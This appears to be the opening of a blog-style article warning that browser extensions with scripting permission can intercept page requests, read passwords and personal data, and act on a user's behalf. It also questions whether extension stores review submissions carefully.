Modern WebExtensions



From ad-blockers to password managers, millions of users browse the web with the help of browser extensions every single day. Do they realize how much access they’re really giving these applications? Do web stores really do their due diligence when it comes to reviewing extensions? Spoiler: the answer is most likely no.

How much can extensions really access?

The answer here is essentially everything. Well, at least anything a webpage can access. The thing is, as soon as you grant an extension scripting permission they will be able to inject any valid JavaScript into a webpage. On top of that, they’ll be able to run this script before the webpage has actually finished loading.

This means, for example, that a bad actor could:

  1. Overwrite the window.fetch() function to intercept any requests made by a webpage, without impacting them
  2. Read input values (like your password) on a webpage
  3. Read any personal data displayed, including you password manager’s web vault
  4. Perform actions on your behalf by interacting with page elements